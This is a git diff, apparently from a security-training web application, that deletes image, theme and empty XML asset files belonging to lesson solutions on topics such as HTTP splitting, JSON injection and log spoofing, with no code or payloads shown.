diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg
deleted file mode 100644
index acfd921d1..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg
deleted file mode 100644
index 4c564391a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg
deleted file mode 100644
index 56107235b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml
deleted file mode 100644
index 8b4e1e66e..000000000
--- a/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png
deleted file mode 100644
index a3cecc9aa..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png
deleted file mode 100644
index d62c55ea3..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png
deleted file mode 100644
index 4168195ac..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png
deleted file mode 100644
index d9f29ebed..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png
deleted file mode 100644
index c75a97ac6..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png
deleted file mode 100644
index addd9bce4..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png
deleted file mode 100644
index 4f70cbce7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png
deleted file mode 100644
index 08c036f4e..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png
deleted file mode 100644
index 9dccc349f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png
deleted file mode 100644
index 17708a3d7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png
deleted file mode 100644
index 59bec4ece..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png
deleted file mode 100644
index 8887f463b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png
deleted file mode 100644
index 83279f010..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png
deleted file mode 100644
index ac9b0590f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg
deleted file mode 100644
index 1f2923a0d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg
deleted file mode 100644
index 5c309829a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg
deleted file mode 100644
index 296995e6d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg
deleted file mode 100644
index 04b19c12d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg
deleted file mode 100644
index 1e20add5b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg
deleted file mode 100644
index cc30af047..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg
deleted file mode 100644
index 0e01db1ea..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg
deleted file mode 100644
index 51964a9bb..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg
deleted file mode 100644
index 9f8efcbb7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg
deleted file mode 100644
index 036e50e47..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg
deleted file mode 100644
index 81b54f365..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg
deleted file mode 100644
index caf41923a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg
deleted file mode 100644
index cd100cf63..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg deleted file mode 100644 index 9a48ce5a4..000000000 Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png b/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png deleted file mode 100644 index 135fc3606..000000000 Binary files a/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml deleted file mode 100644 index 3f7752feb..000000000 --- a/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png deleted file mode 100644 index cfdb7b042..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png deleted file mode 100644 index 217f69bd7..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png deleted file mode 100644 index affeaa193..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png deleted file mode 100644 index 709f70b6a..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png deleted file mode 100644 index b7d120e45..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png deleted file mode 100644 index 3d93d05e5..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg deleted file mode 100644 index 21504eb14..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg deleted file mode 100644 index cf6cc7471..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg deleted file mode 100644 index ccd96c071..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg deleted file mode 100644 index 3710a91c1..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg deleted file mode 100644 index fecffb54d..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg deleted file mode 100644 index f4edbeeb7..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml deleted file mode 100644 index aa9eb0b16..000000000 --- a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml +++ /dev/null @@ -1,29 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png deleted file mode 100644 index bb24a6c8f..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg deleted file mode 100644 index ac600b733..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png deleted file mode 100644 index 20f3f3871..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg deleted file mode 100644 index 0ffa3bfe7..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png deleted file mode 100644 index a189bb3d8..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg deleted file mode 100644 index 2e361f07f..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png deleted file mode 100644 index 2e74b5ec7..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg deleted file mode 100644 index 34cf88ebb..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif deleted file mode 100644 index 1779f251e..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png deleted file mode 100644 index 88661381a..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg deleted file mode 100644 index ab68d0731..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png deleted file mode 100644 index 4d3ab3e2f..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg deleted file mode 100644 index 3ba19dd7e..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png deleted file mode 100644 index 90ea086b2..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg deleted file mode 100644 index 47033c76c..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png deleted file mode 100644 index 36393c423..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg deleted file mode 100644 index 02087fd18..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png deleted file mode 100644 index 6fa005b7c..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg deleted file mode 100644 index fa77e0a36..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png deleted file mode 100644 index 43737e5d1..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg deleted file mode 100644 index 9cde03d4b..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png deleted file mode 100644 index 24ef81f2b..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg deleted file mode 100644 index 8fbe215fd..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db b/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db deleted file mode 100644 index c8864bbfb..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml b/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml deleted file mode 100644 index 66f2f27d6..000000000 --- a/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png deleted file mode 100644 index 59ffaca93..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png deleted file mode 100644 index 100684c5f..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png deleted file mode 100644 index 0174b03b0..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg deleted file mode 100644 index 50abf182f..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg deleted file mode 100644 index afd0c3eb3..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg deleted file mode 100644 index 259e28f16..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx b/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg b/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg deleted file mode 100644 index 4c69a2352..000000000 Binary files a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg b/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg deleted file mode 100644 index 8a2189e3e..000000000 Binary files a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png deleted file mode 100644 index 2cf17feb8..000000000 Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png deleted file mode 100644 index 3179d178e..000000000 Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png deleted file mode 100644 index 896334751..000000000 Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png deleted file mode 100644 index 75acaa951..000000000 Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png b/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png deleted file mode 100644 index 86bad431a..000000000 Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg b/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg deleted file mode 100644 index ea9895612..000000000 Binary files a/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg b/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg deleted file mode 100644 index ee40403cf..000000000 Binary files a/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml deleted file mode 100644 index 496ea3696..000000000 --- a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml +++ /dev/null 
@@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png deleted file mode 100644 index 089968f01..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg deleted file mode 100644 index 4d4b17604..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png deleted file mode 100644 index 0bc317162..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg deleted file mode 100644 index 7978fe44b..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png deleted file mode 100644 index 4f0de1d74..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png and 